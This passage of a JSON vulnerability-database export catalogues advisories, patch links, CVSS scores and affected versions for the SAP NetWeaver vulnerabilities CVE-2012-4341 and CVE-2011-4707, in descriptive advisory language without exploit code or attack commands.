            "url": "http://scn.sap.com/docs/DOC-8218"
          },
          {
            "title": "SAP NetWeaver",
            "trust": 0.8,
            "url": "http://www.sap.com/platform/netweaver/businessbenefits/customdevelopment.epx"
          },
          {
            "title": "SAP has issued an update to correct this vulnerability.",
            "trust": 0.7,
            "url": "https://websmp230.sap-ag.de/sap(bD1lbiZjPTAwMQ==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649838"
          },
          {
            "title": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 parameter name patch for remote code execution vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/18435"
          },
          {
            "title": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 patch for buffer overflow vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/18434"
          },
          {
            "title": "SAP NetWeaver ABAP Fixes for multiple stack-based buffer errors",
            "trust": 0.6,
            "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=209631"
          },
          {
            "title": "",
            "trust": 0.1,
            "url": "https://github.com/Live-Hack-CVE/CVE-2012-4341 "
          },
          {
            "title": "cve-search",
            "trust": 0.1,
            "url": "https://github.com/r3p3r/cve-search "
          },
          {
            "title": "cve-search-src",
            "trust": 0.1,
            "url": "https://github.com/extremenetworks/cve-search-src "
          },
          {
            "title": "",
            "trust": 0.1,
            "url": "https://github.com/ZIEN-TF/z_iot_cve-search-api "
          },
          {
            "title": "",
            "trust": 0.1,
            "url": "https://github.com/pgurudatta/cve-search "
          },
          {
            "title": "cve-search",
            "trust": 0.1,
            "url": "https://github.com/cve-search/cve-search "
          },
          {
            "title": "cve-search",
            "trust": 0.1,
            "url": "https://github.com/dim0niu/cve-search "
          },
          {
            "title": "cve-search",
            "trust": 0.1,
            "url": "https://github.com/swastik99/cve-search-master "
          },
          {
            "title": "cve",
            "trust": 0.1,
            "url": "https://github.com/zwei2008/cve "
          },
          {
            "title": "cve-search",
            "trust": 0.1,
            "url": "https://github.com/miradam/cve-search "
          },
          {
            "title": "modified_cve-search",
            "trust": 0.1,
            "url": "https://github.com/HR-CERT/modified_cve-search "
          },
          {
            "title": "cve-search",
            "trust": 0.1,
            "url": "https://github.com/swastik99/cve-search "
          },
          {
            "title": "cve-search-ng",
            "trust": 0.1,
            "url": "https://github.com/cve-search/cve-search-ng "
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-12-112"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-111"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-104"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3434"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3433"
          },
          {
            "db": "VULMON",
            "id": "CVE-2012-4341"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201208-264"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2012-003710"
          }
        ]
      },
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "CWE-119",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2012-003710"
          },
          {
            "db": "NVD",
            "id": "CVE-2012-4341"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 2.1,
            "url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649840"
          },
          {
            "trust": 2.0,
            "url": "http://www.zerodayinitiative.com/advisories/zdi-12-111/"
          },
          {
            "trust": 2.0,
            "url": "https://service.sap.com/sap/support/notes/1649838"
          },
          {
            "trust": 2.0,
            "url": "http://www.securitytracker.com/id?1027211"
          },
          {
            "trust": 2.0,
            "url": "http://scn.sap.com/docs/doc-8218"
          },
          {
            "trust": 2.0,
            "url": "http://www.zerodayinitiative.com/advisories/zdi-12-104/"
          },
          {
            "trust": 2.0,
            "url": "http://www.zerodayinitiative.com/advisories/zdi-12-112/"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/49744"
          },
          {
            "trust": 1.3,
            "url": "https://websmp230.sap-ag.de/sap%28bd1lbizjptawmq==%29/bc/bsp/spn/sapnotes/index2.htm?numm=1649840"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-4341"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-4341"
          },
          {
            "trust": 0.7,
            "url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649838"
          },
          {
            "trust": 0.6,
            "url": "http://seclists.org/bugtraq/2012/jun/186"
          },
          {
            "trust": 0.6,
            "url": "http://seclists.org/bugtraq/2012/jun/185"
          },
          {
            "trust": 0.6,
            "url": "http://www.securityfocus.com/bid/54229"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/119.html"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/live-hack-cve/cve-2012-4341"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://www.securityfocus.com/bid/78143"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/cve-search/cve-search"
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-12-112"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-111"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-104"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3434"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3433"
          },
          {
            "db": "VULMON",
            "id": "CVE-2012-4341"
          },
          {
            "db": "BID",
            "id": "78143"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201208-264"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201206-539"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2012-003710"
          },
          {
            "db": "NVD",
            "id": "CVE-2012-4341"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "IVD",
            "id": "29348194-1f62-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "db": "IVD",
            "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-112",
            "ident": null
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-111",
            "ident": null
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-104",
            "ident": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3434",
            "ident": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3433",
            "ident": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2012-4341",
            "ident": null
          },
          {
            "db": "BID",
            "id": "78143",
            "ident": null
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201208-264",
            "ident": null
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201206-539",
            "ident": null
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2012-003710",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2012-4341",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2012-07-02T00:00:00",
            "db": "IVD",
            "id": "29348194-1f62-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "date": "2012-07-02T00:00:00",
            "db": "IVD",
            "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "date": "2012-06-28T00:00:00",
            "db": "ZDI",
            "id": "ZDI-12-112",
            "ident": null
          },
          {
            "date": "2012-06-28T00:00:00",
            "db": "ZDI",
            "id": "ZDI-12-111",
            "ident": null
          },
          {
            "date": "2012-06-27T00:00:00",
            "db": "ZDI",
            "id": "ZDI-12-104",
            "ident": null
          },
          {
            "date": "2012-07-02T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2012-3434",
            "ident": null
          },
          {
            "date": "2012-07-02T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2012-3433",
            "ident": null
          },
          {
            "date": "2012-08-15T00:00:00",
            "db": "VULMON",
            "id": "CVE-2012-4341",
            "ident": null
          },
          {
            "date": "2012-08-15T00:00:00",
            "db": "BID",
            "id": "78143",
            "ident": null
          },
          {
            "date": "2012-08-16T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201208-264",
            "ident": null
          },
          {
            "date": "2012-06-28T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201206-539",
            "ident": null
          },
          {
            "date": "2012-08-20T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2012-003710",
            "ident": null
          },
          {
            "date": "2012-08-15T21:55:05.353000",
            "db": "NVD",
            "id": "CVE-2012-4341",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2012-06-28T00:00:00",
            "db": "ZDI",
            "id": "ZDI-12-112",
            "ident": null
          },
          {
            "date": "2012-06-28T00:00:00",
            "db": "ZDI",
            "id": "ZDI-12-111",
            "ident": null
          },
          {
            "date": "2012-06-27T00:00:00",
            "db": "ZDI",
            "id": "ZDI-12-104",
            "ident": null
          },
          {
            "date": "2012-07-02T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2012-3434",
            "ident": null
          },
          {
            "date": "2012-07-02T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2012-3433",
            "ident": null
          },
          {
            "date": "2022-10-06T00:00:00",
            "db": "VULMON",
            "id": "CVE-2012-4341",
            "ident": null
          },
          {
            "date": "2012-08-15T00:00:00",
            "db": "BID",
            "id": "78143",
            "ident": null
          },
          {
            "date": "2022-10-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201208-264",
            "ident": null
          },
          {
            "date": "2012-07-02T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201206-539",
            "ident": null
          },
          {
            "date": "2012-08-20T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2012-003710",
            "ident": null
          },
          {
            "date": "2025-04-11T00:51:21.963000",
            "db": "NVD",
            "id": "CVE-2012-4341",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201208-264"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201206-539"
          }
        ],
        "trust": 1.2
      },
      "title": {
        "_id": null,
        "data": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 Parameter name remote code execution vulnerability",
        "sources": [
          {
            "db": "IVD",
            "id": "29348194-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3434"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "_id": null,
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201208-264"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201112-0297

    Vulnerability from variot - Updated: 2026-04-10 23:51

    Multiple cross-site scripting (XSS) vulnerabilities in the Virus Scan Interface in SAP Netweaver allow remote attackers to inject arbitrary web script or HTML via the (1) instname parameter to the VsiTestScan servlet and (2) name parameter to the VsiTestServlet servlet. The CTC service has an error when performing some verification checks and can be utilized to access user management and OS command execution functions. Inputs passed to the BAPI Explorer through partial transactions are missing prior to use and can be exploited to inject arbitrary HTML and script code that can be executed on the target user's browser when viewed maliciously. When using transaction \"sa38\", RSTXSCRP reports an error and can be exploited to inject any UNC path through the \"File Name\" field. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. TH_GREP reports an error when processing a partial SOAP request, and can inject any SHELL command with the \"\" parameter. The SPML service allows users to perform cross-site request forgery attacks, and can log in to the user administrator context to perform arbitrary operations, such as creating arbitrary users. SAP Netweaver is prone to multiple cross-site scripting vulnerabilities, a path traversal vulnerability, an html-injection vulnerability, a cross-site request-forgery vulnerability, and an authentication-bypass vulnerability. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary commands in the context of the application, disclose sensitive information, perform certain administrative actions, gain unauthorized access, or bypass certain security restrictions

    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": "netweaver",
            "scope": "eq",
            "trust": 5.9,
            "vendor": "sap",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "netweaver sp15",
            "scope": "eq",
            "trust": 4.5,
            "vendor": "sap",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "netweaver sp8",
            "scope": "eq",
            "trust": 4.5,
            "vendor": "sap",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "netweaver",
            "scope": "eq",
            "trust": 4.5,
            "vendor": "sap",
            "version": "7.10"
          },
          {
            "_id": null,
            "model": "netweaver",
            "scope": "eq",
            "trust": 4.5,
            "vendor": "sap",
            "version": "7.30"
          },
          {
            "_id": null,
            "model": "netweaver",
            "scope": "eq",
            "trust": 4.5,
            "vendor": "sap",
            "version": "7.02"
          },
          {
            "_id": null,
            "model": "netweaver",
            "scope": "eq",
            "trust": 4.5,
            "vendor": "sap",
            "version": "7.01"
          },
          {
            "_id": null,
            "model": "netweaver sp15",
            "scope": "eq",
            "trust": 1.4,
            "vendor": "sap",
            "version": "7.0*"
          },
          {
            "_id": null,
            "model": "netweaver sp8",
            "scope": "eq",
            "trust": 1.4,
            "vendor": "sap",
            "version": "7.0*"
          },
          {
            "_id": null,
            "model": "netweaver",
            "scope": "eq",
            "trust": 1.4,
            "vendor": "sap",
            "version": "7.10*"
          },
          {
            "_id": null,
            "model": "netweaver",
            "scope": "eq",
            "trust": 1.4,
            "vendor": "sap",
            "version": "7.30*"
          },
          {
            "_id": null,
            "model": "netweaver",
            "scope": "eq",
            "trust": 1.4,
            "vendor": "sap",
            "version": "7.02*"
          },
          {
            "_id": null,
            "model": "netweaver",
            "scope": "eq",
            "trust": 1.4,
            "vendor": "sap",
            "version": "7.01*"
          },
          {
            "_id": null,
            "model": "netweaver",
            "scope": null,
            "trust": 1.4,
            "vendor": "sap",
            "version": null
          },
          {
            "_id": null,
            "model": "netweaver",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sap",
            "version": "*"
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4916"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4917"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4915"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4912"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4914"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4913"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4911"
          },
          {
            "db": "BID",
            "id": "50680"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201112-122"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2011-003325"
          },
          {
            "db": "NVD",
            "id": "CVE-2011-4707"
          }
        ]
      },
      "configurations": {
        "_id": null,
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:sap:netweaver",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2011-003325"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "Dmitriy Chastuchin, Dmitriy Evdokimov, Alexandr Polyakov and Alexey Tyurin of Digital Security Research Group (DSecRG)",
        "sources": [
          {
            "db": "BID",
            "id": "50680"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2011-4707",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2011-4707",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.9,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "IVD",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.2,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.9 [IVD]"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "IVD",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.2,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.9 [IVD]"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "IVD",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "3e98d306-1f7f-11e6-abef-000c29c66e3d",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.2,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.9 [IVD]"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "IVD",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "3a022216-1f7f-11e6-abef-000c29c66e3d",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.2,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.9 [IVD]"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "IVD",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "40204c22-1f7f-11e6-abef-000c29c66e3d",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.2,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.9 [IVD]"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "IVD",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.2,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.9 [IVD]"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "IVD",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.2,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.9 [IVD]"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2011-4707",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2011-4707",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201112-122",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "IVD",
                "id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d",
                "trust": 0.2,
                "value": "MEDIUM"
              },
              {
                "author": "IVD",
                "id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d",
                "trust": 0.2,
                "value": "MEDIUM"
              },
              {
                "author": "IVD",
                "id": "3e98d306-1f7f-11e6-abef-000c29c66e3d",
                "trust": 0.2,
                "value": "MEDIUM"
              },
              {
                "author": "IVD",
                "id": "3a022216-1f7f-11e6-abef-000c29c66e3d",
                "trust": 0.2,
                "value": "MEDIUM"
              },
              {
                "author": "IVD",
                "id": "40204c22-1f7f-11e6-abef-000c29c66e3d",
                "trust": 0.2,
                "value": "MEDIUM"
              },
              {
                "author": "IVD",
                "id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d",
                "trust": 0.2,
                "value": "MEDIUM"
              },
              {
                "author": "IVD",
                "id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d",
                "trust": 0.2,
                "value": "MEDIUM"
              },
              {
                "author": "VULMON",
                "id": "CVE-2011-4707",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "VULMON",
            "id": "CVE-2011-4707"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201112-122"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2011-003325"
          },
          {
            "db": "NVD",
            "id": "CVE-2011-4707"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "Multiple cross-site scripting (XSS) vulnerabilities in the Virus Scan Interface in SAP Netweaver allow remote attackers to inject arbitrary web script or HTML via the (1) instname parameter to the VsiTestScan servlet and (2) name parameter to the VsiTestServlet servlet. The CTC service has an error when performing some verification checks and can be utilized to access user management and OS command execution functions. Inputs passed to the BAPI Explorer through partial transactions are missing prior to use and can be exploited to inject arbitrary HTML and script code that can be executed on the target user\u0027s browser when viewed maliciously. When using transaction \\\"sa38\\\", RSTXSCRP reports an error and can be exploited to inject any UNC path through the \\\"File Name\\\" field. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. TH_GREP reports an error when processing a partial SOAP request, and can inject any SHELL command with the \\\"\u003cSTRING\u003e\\\" parameter. The SPML service allows users to perform cross-site request forgery attacks, and can log in to the user administrator context to perform arbitrary operations, such as creating arbitrary users. SAP Netweaver is prone to multiple cross-site scripting vulnerabilities, a path traversal vulnerability,  an html-injection vulnerability, a cross-site request-forgery vulnerability, and an authentication-bypass vulnerability. \nAn attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary commands in the context of the application, disclose sensitive information, perform certain administrative actions, gain unauthorized access, or bypass certain security restrictions",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2011-4707"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2011-003325"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4917"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4911"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4913"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4914"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4912"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4915"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4916"
          },
          {
            "db": "BID",
            "id": "50680"
          },
          {
            "db": "IVD",
            "id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "VULMON",
            "id": "CVE-2011-4707"
          }
        ],
        "trust": 7.02
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "BID",
            "id": "50680",
            "trust": 4.6
          },
          {
            "db": "NVD",
            "id": "CVE-2011-4707",
            "trust": 4.2
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201112-122",
            "trust": 2.0
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4916",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4915",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4914",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4917",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4913",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4912",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4911",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2011-003325",
            "trust": 0.8
          },
          {
            "db": "BUGTRAQ",
            "id": "20111117 [DSECRG-11-036] SAP NETWAVER VIRUS SCAN INTERFACE - MULTIPLE XSS",
            "trust": 0.6
          },
          {
            "db": "IVD",
            "id": "3B9467EC-1F7F-11E6-ABEF-000C29C66E3D",
            "trust": 0.2
          },
          {
            "db": "IVD",
            "id": "3D199B1E-1F7F-11E6-ABEF-000C29C66E3D",
            "trust": 0.2
          },
          {
            "db": "IVD",
            "id": "3E98D306-1F7F-11E6-ABEF-000C29C66E3D",
            "trust": 0.2
          },
          {
            "db": "IVD",
            "id": "3A022216-1F7F-11E6-ABEF-000C29C66E3D",
            "trust": 0.2
          },
          {
            "db": "IVD",
            "id": "40204C22-1F7F-11E6-ABEF-000C29C66E3D",
            "trust": 0.2
          },
          {
            "db": "IVD",
            "id": "4119FC7C-1F7F-11E6-ABEF-000C29C66E3D",
            "trust": 0.2
          },
          {
            "db": "IVD",
            "id": "4247BD6E-1F7F-11E6-ABEF-000C29C66E3D",
            "trust": 0.2
          },
          {
            "db": "VULMON",
            "id": "CVE-2011-4707",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4916"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4917"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4915"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4912"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4914"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4913"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4911"
          },
          {
            "db": "VULMON",
            "id": "CVE-2011-4707"
          },
          {
            "db": "BID",
            "id": "50680"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201112-122"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2011-003325"
          },
          {
            "db": "NVD",
            "id": "CVE-2011-4707"
          }
        ]
      },
      "id": "VAR-201112-0297",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "IVD",
            "id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
          },
          {
